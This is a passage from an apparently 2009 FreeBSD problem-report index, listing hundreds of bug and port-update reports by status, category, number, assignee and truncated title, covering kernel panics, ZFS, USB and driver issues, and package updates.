packaging list c f ports/135320 rafan update sysutils/facter to 1.5.6 o bin/135317 randi install.cfg feature request o bin/135314 fs [zfs] assertion failed for zdb(8) usage o ports/135313 multimedia (patch) Update multimedia/podcatcher to 3.1.4 (Sep 200 f ports/135311 mail/dovecot-antispam must be rebuilt if dovecot is up o stand/135307 standards Boot Loader problem on Acer Aspire 5735 o ports/135303 alepulver [PATCH] games/warzone2100: update to 2.2.0 p misc/135301 remko [tinybsd] [patch] Patch for fix architecture support f f ports/135300 update for ports/www/webcheck o www/135294 www new user group for Belgium f ports/135285 wxs [PATCH] sysutils/fusefs-kmod: Fix build on current f ports/135277 miwi [Update]emulators/dosbox:update to 0.73 o ports/135276 x11 x11/xorg: GUI running first time only while using Free o ports/135272 olgeni [PATCH] devel/esdl: update to 1.0.1 f ports/135266 wxs bacula-bat install fails o amd64/135265 amd64 [install] Boot from install cd hangs on HP DL160 G5 wi o ports/135238 multimedia [patch] OPTIONS support in multimedia/transcode o kern/135237 [nfs] sendfile(2) and SF_NODISKIO blocks on NFS files o kern/135222 net [igb] low speed routing between two igb interfaces o ports/135221 portmgr [bsd.port.mk] unified support for LINUX_OSRELEASE depe o usb/135206 usb machine reboots when inserted USB device o ports/135201 sem ports-mgmt/portupgrade: doesn't upgrade lang/tcc o usb/135200 usb SAMSUNG i740 usb mass: Synchronize cache failed, statu f ports/135197 miwi [Update]www/dokeos:update to 1.8.6 f ports/135196 miwi [Update]www/p5-CGI-Application-Plugin-Authentication:u o ports/135189 miwi Update to version 2.0 f ports/135187 miwi [Update] www/phpbb to version 3.0.5 o usb/135182 usb UMASS quirk - Olympus FE20 camera o kern/135179 xen [xen] Xen domU does not properly reboot o kern/135178 xen [xen] Xen domU outgoing data transfer stall when TSO i o docs/135165 doc [patch] make(1) fixes: punctuation, typos, tweaks o kern/135164 [keyboard] UK currency key inactive o ports/135163 wes Update port: devel/poco unbreak and update to 1.3.5 o kern/135162 pf [pfsync] pfsync(4) not usable with GENERIC kernel o bin/135159 [patch] pkg_delete(1) segfaults on empty @pkgdep lines f ports/135157 dinoex [PATCH] print/cups: broken metaport does not install f misc/135156 [build] 8-current installworld - gencat:No such file o r ports/135096 portmgr new port:databases/slonyI-2 o ports/135095 marcus [patch] ports-mgmt/portlint should check for a.out fil f ports/135093 rafan update sysutils/facter to 1.5.5 o ports/135092 mm [PATCH]:lang/tcl85 -- add missing file to plist for WI f ports/135089 portmgr Honor LOCALBASE for CFLAGS f ports/135087 miwi new port:mail/tcpblocker o ports/135085 itetcu [PATCH] port:mail/altermime update to 0.3.10 o ports/135082 chinsan [UPDATE] converters/p5-JSON-DWIW to 0.32 o ports/135080 ache [UPDATE] textproc/p5-Text-CSV_XS to 0.65 o ports/135076 skv [patch] Update www/google-sitemapgen to 1.5 o ports/135072 clsung textproc/refdb -> bib2ris: Assertion failed: ((run->re o kern/135070 acpi [acpi] [patch] BIOS resource allocation and FreeBSD AC o kern/135069 xen [xen] FreeBSD-current/Xen SMP doesn't function at all o kern/135067 net [patch] [fib] Incorrect KASSERTs in sys/net/route.c o kern/135057 [ata] [patch] New VIA SATA controller are not getting o ports/135055 mat [PATCH] devel/p5-DateTime-TimeZone: update to 0.91 o ports/135054 bsam comms/gammu amd64 build problems o kern/135050 fs [zfs] ZFS clears/hides disk errors on reboot o amd64/135040 amd64 FreeBSD/amd64 does not (always) detect disk on SB600/A o kern/135039 fs [zfs] mkstemp() fails over NFS when server uses ZFS (7 o ports/135024 portmgr request MOVED and UPDATING from pointyhead o ports/135019 sysutils/bubblemon-dockapp 1.46_6 memory usage meter i f ports/135018 Port multimedia/vlc fails to compile when WITHOUT_X11= o bin/135017 [libc] bind exiting (due to assertion failure). resolv o bin/135016 randi [request] sysinstall(8) needs support for USB devices o kern/135014 [padlock] Using padlock(4) in 8-current triggers "fpud p usb/135009 weongyo [uath] [patch] Accton ar5523 products not in "uath" dr o kern/135008 xen [xen] FreeBSD-current/Xen timecounter jumps o ports/135002 gahr don't make in /usr/ports/net-im/openfire f ports/135000 olgeni don't make in /usr/ports/lang/erlang o kern/134996 pf [pf] Anchor tables not included when pfctl(8) is run w o i386/134986 i386 [build] make installworld fails (FreeBSD-7.2, tr not f o ports/134985 jmelo Update port: net/gateway6 MASTER_SITES update o i386/134984 i386 [boot] [hang] boot from i386 DVD on Lenovo R500 fails o kern/134980 no effect of ATA_STATIC_ID on CURRENT with AHCI enable o amd64/134978 amd64 g_up pmap amd64 panic o bin/134975 ipfw [patch] ipfw(8) can't work with set in rule file. f ports/134971 beat Update port: cad/p5-Verilog-Perl incorrect pkg-plist a o kern/134956 FreeBSD 7.1 & 7.2, Intel PRO/1000 PT Quad Port Server o bin/134955 delphij gzip(1) always stores time stamp since 6.3-RELEASE [re o ports/134952 perl [patch] security/p5-Net-SSLeay build shouldn't need in o usb/134950 usb Lowering DTR for USB-modem via ubsa is not possible o misc/134947 [build] compiling world (libcrypto) o ports/134946 alexbl [PATCH] textproc/highlight: update to 2.9 f ports/134945 [UPDATE] update sysutils/linux-megacli s ports/134942 amdmi3 Update cad/brlcad to version 7.14.8 o kern/134931 net [route] [fib] Route messages sent to all socket listen o kern/134926 xen [xen] [panic] FreeBSD-current Xen DomU networking pani o kern/134922 geom [gmirror] [panic] kernel panic when use fdisk on disk o misc/134920 [patch] Large upgrades from source cause compile error o bin/134919 [patch] add information to truss(1) when tracing linux o conf/134918 rc rc.subr fails to detect perl daemons o kern/134914 kernel/zfsboot buildworld error 'btxld: zfsboot.ldr: I f bin/134907 vwe boot0cfg(8): choose / adjust the booting slice doesn't o kern/134887 [ataraid] source consistency problem o kern/134883 [vfs] [panic] kernel panic, superpages, vfs.lookup_sha p bin/134881 stefanf sh(1) with 'set -e' exits immediately in tested eval c o ports/134880 ale lang/php5 - PHP CLI interactive mode misbehaviour with o kern/134878 [puc] [patch] Add support for Oxford OXPCIe954 and OXP o ports/134874 alepulver [patch] Port fix games/iourbanterror on amd64 o ports/134866 lbr Unable to install databases/p5-DBIx-Class port with SQ o ports/134802 matusita japanese/skk-jisyo - Package ja-skk-jisyo-200904 is br o kern/134800 [drm] radeon driver freezes Xorg server with drmwtq o i386/134792 [boot] [panic] problems installing and booting on MSI f kern/134788 delphij [bce] failure to set ip address in amd64 if_bce.c, i38 o amd64/134786 amd64 [vfs] [patch] vfs.bufspace sysctl wideness on amd64 o ports/134785 novel [patch][vuxml] security/gnutls: update to 2.6.6 and do o ports/134774 mono lang/mono won't build on 6.4-STABLE f ports/134773 openoffice [patch] editors/openoffice.org-3 reduce depenedencies f ports/134770 lang/spidermonkey misses installation of some header f o ports/134768 marcus Update port: net/tac_plus4 add profiles support to rc. o kern/134767 multimedia [snd_hda] Sigmatel STAC9205X no sound under RELENG_7_2 f usb/134766 gavin Add blacklist for Cyberpower UPS to uhid o amd64/134757 amd64 32 bit processes on 64 bit platforms occasionally drop o ports/134750 alexbl [Update]textproc/py-markdown:update to 2.0.1 o kern/134745 [mmcsd] [panic] mmcsd.ko produce kernel panic f ports/134743 devel/Monotone and pthreaded dependencies o ports/134738 ahze Update ports: www/midori to 0.1.6 p ports/134737 gnome Update www/webkit-gtk2 to 1.1.7 o ports/134736 python [Update]www/py-pylons:update to 0.9.7 o ports/134734 delphij net/py-ldap2 - Package py25-ldap2 in 7.2-RELEASE fails s ports/134714 sem ports-mgmt/portupgrade deletes user data without quest o ports/134711 mail/postfix - repocopy of (old) postfix to postfix25 o ports/134699 multimedia multimedia/gstreamer-ffmpeg - /usr/X11R6/bin: file not o ports/134696 jmelo [UPDATE] mail/clamfilter: change MASTER_SITES to somet o ports/134689 gecko www/Firefox ports and packages in chroot or jails cras o conf/134660 rc [patch] rc-script for initializing ng_netflow+ng_ipfw o kern/134658 net [bce] bce driver fails on PowerEdge m610 blade. o ports/134656 miwi Create www/pecl-APC-dev o ports/134650 beech [patch] net/x11vnc fix build for option WITHOUT_NLS o ports/134647 glewis [patch] java/jdk16 reduce depenedencies on cups-base o ports/134643 x11 [patch] x11-servers/xorg-server - Unbreak Xorg 7.4 ser f ports/134639 devel/boost can't be made with parameteres -DWITH_PYT o usb/134633 usb Add support for WILLCOM03(SHARP smart phone) o ports/134632 kwm [patch] Update port: multimedia/ffmpeg 2009-05-15 o usb/134631 usb [usbdevs] [patch] WiSPY DBx support requires usb tweak o ports/134618 shaun news/inn update to 2.4.6 o bin/134616 named(8): the working directory is not writable o gnu/134604 [gcclibs] [patch] Memory leak in gcclibs/libgomp f ports/134594 lwhsu [PATCH] security/pwman3: use cElementTree and sqlite c o ports/134593 pgollucci [repocopy]: net-mgmt/net-snmp -> net-mgmt/net-snmp55 o kern/134591 [ral] ral(4) driver frequently loses carrier (on RT256 o kern/134590 [libi386] [gpt] [patch] Bootloader support for hybrid f ports/134589 beech Update port: irc/scrollz version 2.0 released o i386/134586 jhb [i386] [patch] Incorrect machine check exception handl o kern/134584 [panic] spin lock held too long o kern/134583 net [hang] Machine with jail freezes after random amount o p i386/134582 phk merge geode.c from head to releng_7_2 a ports/134577 apache www/apache22: build faild with mod_auth_digest o bin/134569 [heimdal] krb5-config does not return all libs necessa o kern/134557 net [netgraph] [hang] 7.2 with mpd5.3 hanging up - ng_pptp o ports/134543 philip [patch] games/wesnoth: update to 1.6.2 o ports/134541 alexbl Mk fix: Fix typos in bsd.scons.mk o kern/134540 [sysctl] [panic] kernel panic after sysctl -a (in strl f ports/134537 miwi misc/e2fsprogs-libuuid closes too manu descriptors [pa f ports/134536 gnome [patch] graphics/gimp: Gimp 2.6.6 fails to open URI's f ports/134535 miwi sysutils/e2fsprogs uuidd is broken [patch] o ports/134534 beech [PATCH] net/skype12, remove IGNORE o kern/134531 net [route] [panic] kernel crash related to routes/zebra o ports/134530 skv UPDATE: databases/skytools o kern/134520 [ata] SAS HD not detected on LSI SAS1078 (Acer Altos R o kern/134519 [panic] Kernel panics (2 page faults in kernel) s kern/134517 yongari [rl] [patch] Realtek 8111C Driver Backport for FreeBSD o ports/134515 shaun [PATCH] www/kannel: unbreak kannel on sparc64 o ports/134514 perky [PATCH] devel/libsigsegv: unbreak on sparc64 o kern/134513 [libc] [patch] fts(3) FTS_NOCHDIR misbehavior with emp o ports/134509 gnome graphics/inkscape: after loading any type of data file o www/134505 www www.freebsd.org does not correctly process If-Modified o kern/134504 [vesa] thinkpad t60 with ati x1400 in vesa console mod o kern/134502 [libelf] why 32 bit app not use /libexec/ld-elf32.so.1 o ports/134501 mat [PATCH] devel/p5-DateTime: update to 0.50 o ports/134498 skv [PATCH] devel/p5-Class-Accessor: update to 0.33 f kern/134496 fs [zfs] [panic] ZFS pool export occasionally causes a ke o kern/134491 fs [zfs] Hot spares are rather cold... o kern/134488 scsi [mpt] MPT SCSI driver probes max. 8 LUNs per device s ports/134485 net-mgmt/trafd 3.0.2.1 doesn't collect traffic o usb/134476 usb [usb2] [umass] [quirk] Add quirk for Cypress xx6830xx o ports/134475 beech multimedia/xmms gdk error (terminates) o ports/134474 deskutils/wmpinboard segfaults on startup o conf/134468 /etc/ntp created by default - but not used by /etc/def o ports/134463 gnome misc/gnome-icon-theme: gnome-icon-theme-2.26.0_1 compi o ports/134458 openoffice editors/openoffice.org* fails to build (multiple versi o ports/134456 pgollucci www/apache22: file permissions are wrong o ports/134443 [NEW PORT] multimedia/2ManDVD: Create your own video d o bin/134425 sysinstall(8) custom distributions select all and dese o ports/134414 araujo graphics/mesa-demos does not build on FreeBSD-7.2 i386 o kern/134408 [dtrace] [panic] "opensnoop" DTrace script panics ever f kern/134407 gavin [hang] freebsd 7.x freezes with the livefs or install o kern/134401 net [msk] [panic] Kernel Fatal trap 12: page fault while i f kern/134398 gavin [ata] problems with udma modes on atapi ixp600 o ports/134397 lme [patch] games/scummvm update o kern/134391 [libc] dladdr(3) does effectively not work on main pro o bin/134389 cperciva portsnap(1): phttpget opens a new connections for ever o ports/134383 skv devel/bugzilla failes to find DBD::mysql o ports/134379 perl net/p5-perl-ldap makes no mention of Net::LDAP o docs/134376 doc pthread(3): pthread manpages don't mention that PTHREA o kern/134369 net [route] [ip6] IPV6 in Head broken for routing table up o arm/134368 arm [patch] nslu2_led driver for the LEDs on the NSLU2 a ports/134361 gnome devel/gvfs ports with smbclient support doesn't pass a f ports/134358 gnome x11/gnome2: trackerd uses up all of the cpu o ports/134357 nobutaka Fix multimedia/libdvdnav with libdvdcss shared lib bum a kern/134355 [mbuf] comments for m_getm2 inconsistent with behaviou p ports/134352 dinoex fix all the ports depending print/cups-base s ports/134347 mail/spamd: spamlogd's whitelist expiration period is o kern/134344 top(1) shows user CPU value that's not equal to the to o arm/134338 arm [patch] Lock GPIO accesses on ixp425 o conf/134333 rc PPP configuration problem in the rc.d scripts in combi o kern/134328 [build] FreeBSD 7.2-RELEASE (STABLE) not compiled with f ports/134311 wxs misc/gnuls: problems with gnuls -l on versions >= 7.x o usb/134299 usb Kernel Panic plugging in MF626 USB UMTS Stick u3g o ports/134273 multimedia [patch] multimedia/ffmpeg - avoid crash in multimedia/ f ports/134271 mail/popd POP3 server dies handling messages with very f ports/134264 audio/cmus - segmentation fault with ogg files o ports/134263 des sysutils/munin-node failure in some o conf/134258 /boot/default/loader.conf contains untrue default o ports/134256 mm [patch] net-im/mu-conference. Unbreak build with mysql p kern/134251 dchagin [linux] skype-2.0.0.72 broke with recent kernel change o bin/134250 [rc.d] mountlate: bogus error message when using neste o kern/134249 [libiconv] [patch] ignore case for character set names o ports/134244 x11 x11/xorg: "intel" driver for Xorg is very broken o ports/134243 skv port mail/libdomainkeys doesn't build dktest o i386/134242 i386 [boot0] [patch] improvement i386 boot0 error diagnose o ports/134239 python [patch] rc script for net-p2p/py-bittornado o kern/134231 [sysctl] sysctl() 80% slower in 7.2 than 6.2 [regressi o docs/134226 doc /usr/share/examples/ftpd/ftpd.conf does not exist. o kern/134225 [libexec] [patch] Reduce disk write load from save-ent o docs/134222 doc installation failure of japanese docs o ports/134214 chinsan [PATCH] devel/p5-List-Rotation-Cycle: update to 1.009 o ports/134206 mnag vuxml submission for databases/memcached o kern/134200 [panic] Fatal trap 12: page fault while in kernel mode o ports/134194 x11 graphics/dri fail on 7.2-RELEASE amd64 o usb/134193 usb System freeze on usb MP3 player insertion o ports/134182 sem ports-mgmt/portupgrade incorrectly handles manual reje o ports/134181 chinsan [MAINTAINER] www/httrack: update to 3.43.4 o conf/134169 El servidor X no detecta pantallas o kern/134168 net [ral] ral driver problem on RT2525 2.4GHz transceiver o bin/134167 cperciva [request] freebsd-update(8) should be able to be run i o ports/134166 skv [PATCH] devel/p5-prefork: update to 1.03 o kern/134157 net [dummynet] dummynet loads cpu for 100% and make a syst o ports/134155 danfe x11/nvidia-driver does not work with KVA_PAGES=512 and o ports/134148 ale databases/mysql50-server: InnoDB fails after upgrading o ports/134132 x11 x11-servers/xorg-server: Intel i845 - xorg.conf with U o docs/134127 doc [patch] ip6(4) manual does not contain proper referenc o docs/134123 doc The RUNQUEUE(9) man page is out of date o ports/134121 gecko www/firefox3-devel packaging errors o usb/134117 usb [Patch] Add support for 'Option GlobeTrotter HSDPA Mod o kern/134113 geom [geli] Problem setting secondary GELI key o ports/134112 [MAINTAINER] net/asterisk16-addons: update to 1.6.1.0 o ports/134109 lme [PATCH] multimedia/devede: Fix Python Psyco support f i386/134106 i386 [boot] Dell Dimension XPS R400 fail to boot on CF IDE f kern/134105 gavin rl(4) Realtek 8110SC with device ID 0x814910ec not det f java/134098 glewis java/diablo-jdk15: random core drops o arm/134092 arm [patch] NSLU.hints contains wrong hints for on board n o usb/134085 usb [umass] Adding usb quirk for Sony USB flash drive o ports/134083 clsung textproc/refdb: missing tool bib2ris due to missing li o ports/134082 x11 x11/xdriinfo: xdriinfo-1.0.2 build fail o kern/134079 net [em] "em0: Invalid MAC address" in FreeBSD-Current ( 8 o docs/134074 doc [patch] locking.9 man page slight enhancements o ports/134071 danfe [patch] Port update to games/nexuiz 2.5 p docs/134070 danger old path for a file given in kbdmap(1) o bin/134069 [patch] mount_nfs(8) option parsing bug f ports/134055 pav bulding port: misc/libhome on FreeBSD 7.1 amd64 o kern/134054 [ataraid] [panic] traps kernel on boot if Intel Matrix p docs/134053 danger [patch] arp(8) manpage should mention ndp(8) in See Al o ports/134052 skreuzer Update port: games/mangband to latest version p kern/134050 bz cpuset allows change of the jail's set from inside the o kern/134044 geom [geom] gmirror(8) overwrites fs with stale data from r o ports/134042 clsung please update databases/mysql-proxy to 0.7.0 o bin/134038 dougb [patch] mergemaster(8): preserve mode/ownership for ex o bin/134022 host(1), dig(1) and nslookup(1) hang in _umtx_op sysca o kern/134011 [hang] swap_pager_getswapspace(4): failed o kern/134010 [gssapi][patch] Buffer overflow and use-after-free in o conf/134006 rc [patch] Unload console screensaver kernel modules if s o ports/134005 hrs x11/xorg: Cannot type underscore and other key on JP10 o ports/133996 flz [PATCH] mail/gnome-gmail-notifier: migrate to devel/li o usb/133989 usb [newusb] [ukbd] USB keyboard dead at mountroot> prompt f ports/133988 hrs Neither print/acroread8 nor print/acroread9 work on a o conf/133987 rc [rc.d] defaultroute broken with DHCP in some cases o kern/133985 [kernel] kern.cp_time returns all zeros and stops incr o kern/133980 fs [panic] [ffs] panic: ffs_valloc: dup alloc o bin/133979 pkg_create(1): pkg_create -n gives an error o amd64/133977 amd64 [panic] [ffs] "panic: ffs_blkfree: freeing free block" o kern/133969 net [dummynet] [panic] Fatal trap 12: page fault while in o kern/133968 net [dummynet] [panic] dummynet kernel panic o ports/133959 multimedia multimedia/transcode: update o ports/133946 x11 x11-servers/xorg-server [patch] X crashes in xinerama o kern/133931 geom [geli] [request] intentionally wrong password to destr o ports/133928 New Port: multimedia/gdialog, A Project X addon to rea o kern/133926 [request] MAXLOGNAME, the username length limit, is to o kern/133919 [mpt] [panic] 7.1 panics after completing rebuild of m o ports/133918 clsung textproc/refdb: adduser -R does not work with PostgreS o bin/133907 [patch] cp(1) wrongly reports errors in vacuous copy o kern/133902 net [tun] Killing tun0 iface ssh tunnel causes Panic Strin o ports/133899 cjh korean/ami doesn't work on amd64 o ports/133897 fjoe [patch] devel/cvsnt add depends for libxm2 o kern/133892 sam /usr/src/sys/dev/ath/if_ath.c:3414: error: 'const stru o conf/133890 rc [patch] sshd(8): add multiple profiles to the rc.d scr o kern/133872 [ata] SATA300 controlled as SATA150 on ICH7R mobo o kern/133867 initgroups(3) Invalid argument o www/133862 www 24 bit version of FreeBSD favicon o bin/133860 [patch] lorder(1) misses symbols defined in read only o ports/133850 mat devel/p5-Log-Dispatch install dependencies o ports/133848 markus net-p2p/ktorrent-devel: request for removal o ports/133844 python New port: databases/py-postgresql python3 pgsql drive o ports/133843 sobomax Update port net/asterisk16 - add spandsp option/depenc o bin/133834 [patch] chat(1): terminate()/fatal() infinity mutual r o ports/133829 ale Wrong plist generated if nonstandard MANPREFIX and PRE o ports/133822 New port for cad/linux-eagle5 (Eagle 5.5.0) o ports/133818 wxs bacula-server-2.4.2: make_sqlite_tables sets wrong per o ports/133815 portmgr [PATCH] bsd.port.mk: implements fakeroot for the ports o ports/133803 kevlo archivers/deco and misc/deco ports confict by name and o kern/133786 [netinet] [patch] ip_input might cause kernel panic o kern/133776 [libc] [patch] snprintf(3) and vsnprintf(3) do not pro o kern/133775 [patch] gdb(1) debugscripts: fix proc address print in a ports/133773 apache net/keepalived port update request o ports/133771 doceng print/ghostscript8: Ghostscript8-8.64 port not install f kern/133768 gavin [panic] MONITOR PANIC: vcpu-0:VMM64 DoubleFault src=MO o docs/133765 doc setfib(2) man page section f ports/133758 pgollucci new net-mgmt/net-snmp does not count inactive memory a o ports/133747 amdmi3 fkiss and gondola not working on amd64 - seg fault f ports/133740 glarkin [new Port] www/archiva o kern/133736 net [udp] ip_id not protected ... p threa/133735 attilio Multi-threaded 32 bit cores can't be used on 64 bit sy o threa/133734 threads 32 bit libthr failing pthread_create() s kern/133733 [pci] [patch] Incorrect record in pci_vendors for Broa o kern/133732 pf [pf] max-src-conn issue o www/133730 www amd64 motherboard success report: Asrock A770DE AMD7 o i386/133727 i386 chars [[[[[[[[[[[[[ occur during install process (sett o ports/133723 sobomax asterisk-1.6.0.9 crash when load chan_h323 o conf/133715 [terminfo] [patch] no terminfo for rxvt-unicode termin f usb/133712 gavin [ural] [patch] RE: Fixed an issue with ural(4) that wa o kern/133710 [includes] net/bpf.h and netgraph/ng_message.h should o ports/133704 pgollucci www/apache22 apxs does not work as expected o amd64/133701 amd64 Recompiling the kernel with k8temp or smbios break GEO o kern/133676 fs [smbfs] [panic] umount -f'ing a vnode-based memory dis o ports/133663 skv [PATCH] devel/p5-POE: update to 1.0040 o ports/133641 doceng [PATCH] print/ghostscript7 crash bug o kern/133614 fs [smbfs] [panic] panic: ffs_truncate: read-only filesys o kern/133613 net [wpi] [panic] kernel panic in wpi(4) o ports/133609 x11 x11/xorg crashes with vlc, intel video driver o kern/133595 net [panic] Kernel Panic at pcpu.h:195 o kern/133593 [ata] `atacontrol spindown` won't affect disk until so p amd64/133592 kib [busdma] [patch] busdma incorrectly calculates bounce o kern/133583 [libm] fma(3) does not respect rounding mode using ext o kern/133572 net [ppp] [hang] incoming PPTP connection hangs the system o docs/133567 doc [patch] doc/Makefile switch to csup o ports/133563 security/cfs rc script needs "mntudp" option on 8-CURR f usb/133545 usb [usb] [panic] Kernel crash in usb2_intr_schedule_adjus f misc/133540 gavin Cannot connect to ftp mirrors for 7.2 beta boot-only f ports/133533 pgollucci [PATCH] Add a static user/group for audio/musicpd port o power/133503 ppc Sound stutter after switching ttys o ports/133500 glewis java/diablo-jre16: fetch error: does not tell what fil o kern/133495 [de] interface not properly initialized on boot o bin/133493 gtp(8): 'gpt boot' should mark the slice in the protec o kern/133491 [libfetch] [patch] Digest HTTP authentication support o kern/133490 net [bpf] [panic] 'kmem_map too small' panic on Dell r900 o ports/133482 x11 x11/libXext "Generic Event Extension not available" er o ports/133465 x11 x11/xorg: X crashes with mplayer -vo xv with xf86-vide o ports/133464 clsung security/snort fails first try o ports/133462 multimedia multimedia/x264 build fails on powerpc o ports/133457 eclipse [PATCH] java/eclipse-webtools: update to 3.0.3 o bin/133455 pkg_delete(1): problem with delete packages. f ports/133451 www/plone3 build fails. Plone3 needs python-2.4 but li o ports/133440 python Building lang/python30 with UCS-4 support doesn't work p kern/133439 kan [vfs] [panic] Kernel Panic in kern_vfs o ports/133430 oliver [patch] multimedia/audacious 1.5.1: file dialog opens o ports/133423 eclipse [PATCH] java/eclipse-emf: Update to 2.4.1 o ports/133421 [NEW PORT] java/eclipse-xsd: EMF-XSD Runtime o ports/133419 x11 Unable to build x11-drivers/xf86-video-nsc o ports/133417 eclipse [PATCH] java/eclipse-gef: update to 3.4.1 o ports/133416 girgen postgresql-8.3 repo copy request o ports/133413 mich [patch] sysutils/libcdio 0.78.2 is broken for CDROMs t o ports/133411 edwin www/mod_encoding does not work on amd64 with apache22 o usb/133390 usb umass crashes system in 7.1 when Olympus D-540 attache o i386/133388 i386 [est] est causes wrong dev.cpu.0.freq_levels values o power/133383 ppc firefox thr_kill crash with heavy vm load o power/133382 ppc [install] Installer gets signal 11 o kern/133373 fs [zfs] umass attachment causes ZFS checksum errors, dat f ports/133344 net/nss_ldap fails to compile if world was installed w p stand/133339 kib dlfunc(3) does not respect RTLD_SELF, RTLD_NEXT,... o kern/133328 net [bge] [panic] Kernel panics with Windows7 client o ports/133303 lang/visualworks cannot load Jun because of lacking TG o usb/133296 usb rum driver not working properly in hostap mode o ports/133291 nork [PATCH] graphics/ilmbase: produces library not linked o kern/133289 [vm] [panic] DEBUG_MEMGUARD with vm.memguard.desc="dev o misc/133286 dd can fill system memory o kern/133265 jail [jail] is there a solution how to run nfs client in ja o www/133262 www FreeBSD on ASUS M2N-MX SE + p bin/133255 stefanf [PATCH] sh(1): empty line in eval resets $? o ports/133254 [bsd.fpc.mk] don't display bogus message for fpc-using o i386/133253 i386 [acd] Error mounting install image o ports/133250 cy [PATCH] sysutils/screen: remove NO_PACKAGE. o kern/133246 [libc] dlclose(3) gives segfault when called in the fi o docs/133245 doc french handbook 27.3.5 amd.map amd.conf p kern/133240 [boot] off-by-one error in gets.c causes panic when in o kern/133239 [ae] [jme] [patch] if_jme can assign duplicate MAC add o kern/133235 net [netinet] [patch] Process SIOCDLIFADDR command incorre o docs/133228 doc handbook 23.3.5 screenmap section is confusing o bin/133227 [patch] whois(1): add support for SLD whois server loo o kern/133218 net [carp] [hang] use of carp(4) causes system to freeze f www/133215 jkois FreeBSD Consultant f misc/133213 arp and sshd errors o kern/133204 net [msk] msk driver timeouts o ports/133197 pgollucci [bsd.apache.mk] Rephrase IGNORE statement, kill EOL sp o ports/133196 chinsan net/xmlrpc-c: rtorrent-devel rtorrent std::bad_alloc o docs/133186 doc powerd(8) man page errors o ports/133175 x11 [patch] x11/pixman: enable SSE2 support autodetection o kern/133174 fs [msdosfs] [patch] msdosfs must support utf-encoded int o kern/133170 [md] [panic] panic when detaching swap-backed md(4) di o kern/133162 [NOTES] [patch] document modular ata driver devices f misc/133158 Download not available f kern/133150 fs [zfs] Page fault with ZFS on 7.1-RELEASE/amd64 while w o ports/133146 ahze [patch] x11-fonts/dejavu: install fontconfig configura o kern/133144 [linux] linuxulator 2.6 crashes with nvidias libGL.so. o kern/133143 [ubsec] [panic] Kernel panic with ubsec and cryptodev; o kern/133134 fs [zfs] Missing ZFS zpool labels o kern/133122 [ata] TIMEOUT - READ_BIG with pata dvd-drive o docs/133118 doc [patch] Error in getopt (1) manual EXAMPLES section o docs/133110 doc [patch] Typo corrections for /usr/src/UPDATING o ports/133098 mbr [patch] mail/up-imapproxy hardcoded to use /etc/imappr o ports/133081 python [bsd.python.mk] PYEASYINSTALL_ARCHDEP=yes makes broken o ports/133078 kde [PATCH] kmix (multimedia/kdemultimedia4) incorrectly b f ports/133072 jpaetzel [patch] net/isc-dhcp30-server, net/isc-dhcp30-server: o ports/133068 New port: audio/linux-genpuid o kern/133060 net [ipsec] [pfsync] [panic] Kernel panic with ipsec + pfs o ports/133047 glarkin [maintainer-update] Update graphics/linux-ac3d to 6.4. f ports/133031 ports/net/igmpproxy "must be at least 2 Vif's where on o ports/133026 clsung security/botan: missing digit in .so means ldconfig mi f kern/133020 fs [zfs] [panic] inappropriate panic caused by zfs. Pani o bin/132993 [patch] bsnmpd(1) - bad IfPoll timer interval o kern/132991 net [bge] if_bge low performance problem o kern/132987 daichi [unionfs] unionfs_readdir has math problem o kern/132984 net [netgraph] swi1: net 100% cpu usage o kern/132960 fs [ufs] [panic] panic:ffs_blkfree: freeing free frag o docs/132959 doc description mismatches on xterm/termcap, fortune/freeb o ports/132952 obrien [patch] lang/pcc update o kern/132934 [nfs] Cancel of a NFS-lock fails repeatedly o ports/132913 alepulver sysutils/fusefs-ntfs: ntfs-3g 2009.2.1 mount problem f bin/132911 net ip6fw(8): argument type of fill_icmptypes is wrong and o ports/132905 oliver security/oidentd build faild on 8.0-CURRENT o kern/132889 net [ndis] [panic] NDIS kernel crash on load BCM4321 AGN d o ports/132888 openoffice editors/openoffice.org-3: openoffice 3.0.1 fails to bu o kern/132885 net [wlan] 802.1x broken after SVN rev 189592 o docs/132884 doc [request] No manpage for SYSINIT and SYSUNINIT o ports/132881 girgen [PATCH] www/jakarta-jmeter: update to 2.3.2 o kern/132852 [lor] LOR between sysctl and acpi_ibm o conf/132851 net [fib] [patch] allow to setup fib for service running f o kern/132848 multimedia [snd_emu10kx] driver problem with card init, snd_emu10 o bin/132847 syrinx [patch] bsnmpd(8): snmp_pf: add support for retrieving o bin/132845 geom [geom] [patch] ggated(8) does not close files opened a o docs/132839 doc [patch] Fix example script in ldap-auth article p docs/132834 trhodes [patch] Punctuation inconsistency in chgrp.1 and cut.1 o kern/132832 net [netinet] [patch] tcp_output() might generate invalid p ports/132828 vd devel/pth broken due to introduction of pthread_kill p o ports/132820 skreuzer www/rt38: charts in RT-3.8.2 do not render p usb/132799 usb [usb][patch]GENESYS USB2IDE requires NO_SYNCHRONIZE_CA o bin/132798 net [patch] ggatec(8): ggated/ggatec connection slowdown p f ports/132792 pgollucci [new port] re-activating print/ifhp f ports/132790 stas lang/ruby19 fails it's own 'make test' suite o ports/132786 New port: sysutils/sispmctl Utility for controlling a o usb/132785 usb [usb] [patch] Gemtech remote powersocket is classed as o ports/132783 portmgr ports/Mk/bsd.port.mk: ${ARCH} misuse for "--build" opt o bin/132779 calendar(1) utility processes SunLast (and likely simi o kern/132774 rwatson [ipfw] IPFW with uid/gid/jail rules may lead to lockup o ports/132772 skv [new port] lang/rakudo-devel The Rakudo Perl 6 Compil o kern/132769 pf [pf] [lor] 2 LOR's with pf task mtx / ifnet and rtent o conf/132766 rc wait_for_pids() in /etc/rc.subr is dull. o bin/132735 Berkeley db: corrupted file has record with absurd siz o kern/132734 net [ifmib] [panic] panic in net/if_mib.c o kern/132722 net [ath] Wifi ath0 associates fine with AP, but DHCP or I o docs/132718 doc [handbook] Information about adding a new mirror is ou o kern/132715 net [lagg] [panic] Panic when creating vlan's on lagg inte f ports/132707 amdmi3 New port: games/GHost++, a Warcraft 3 game hosting bot o kern/132705 net [libwrap] [patch] libwrap - infinite loop if hosts.all o ports/132693 sobomax [PATCH] misc/libpri: update to 1.4.9 o bin/132692 [patch] getent(1): no support for netgroup o ports/132688 sobomax [PATCH] net/asterisk: update to 1.4.23.2 o ports/132680 openoffice editors/openoffice.org-3: OpenOffice symlinks in /usr/ f misc/132674 gavin new MotherBoards with WiFi cards o kern/132672 net [ndis] [panic] ndis with rt2860.sys causes kernel pani o kern/132669 net [xl] 3c905-TX send DUP! in reply on ping (sometime) o kern/132664 [lor] vfs_mount.c / msdosfs_vfsops.c o kern/132625 net [iwn] iwn drivers don't support 